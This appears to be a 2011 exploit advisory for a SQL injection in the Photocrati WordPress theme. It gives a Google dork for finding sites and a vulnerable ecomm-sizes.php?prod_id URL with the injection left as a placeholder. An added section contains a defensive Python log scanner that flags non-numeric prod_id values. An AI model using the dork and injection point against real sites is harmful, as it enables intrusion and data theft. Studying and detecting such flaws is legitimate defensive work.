# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]

--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

An attacker can perform a remote SQL injection through the site URL to obtain sensitive information.
Almost all versions are affected by this vulnerability.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
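
Added example (not part of the original advisory): a log check that flags requests to the ecomm-sizes.php path above whose prod_id is not a plain integer. It assumes a combined-format access log and that legitimate prod_id values are short decimal integers; the log lines and the theme directory name are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# Script path from the advisory; the theme directory name differs per site.
SCRIPT_RE = re.compile(r"^/wp-content/themes/[^/]+/ecomm-sizes\.php$", re.I)
# Assumption: a legitimate prod_id is a short decimal integer.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_prod_ids(log_line):
    """Return decoded prod_id values on ecomm-sizes.php that are not integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    # Decode the path so percent-encoded spellings of the script name still match.
    if not SCRIPT_RE.match(unquote(url.path)):
        return []
    # parse_qs percent-decodes values; blank and repeated parameters are kept.
    values = parse_qs(url.query, keep_blank_values=True).get("prod_id", [])
    return [v for v in values if not VALID_ID_RE.fullmatch(v)]


def scan(lines):
    """Return (line_number, bad_values) for every log line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        bad = suspicious_prod_ids(line)
        if bad:
            hits.append((number, bad))
    return hits


# Constructed sample log: documentation IPs, made-up theme directory name.
THEME = "/wp-content/themes/photocrati-theme/ecomm-sizes.php"
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET {THEME}?prod_id=12 HTTP/1.1" 200 512',
    f'203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET {THEME}?prod_id=12%27 HTTP/1.1" 200 0',
    f'203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET {THEME}?prod_id=12+x HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?prod_id=12%27 HTTP/1.1" 200 90',
    f'203.0.113.9 - - [01/Jan/2024:10:00:08 +0000] "GET {THEME}?prod_id= HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric prod_id {bad!r}")
```

Only query strings recorded in the access log are inspected, so parameters sent in a request body are outside what this check sees.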

greetz to all muslims and all tryag members
:) from morocco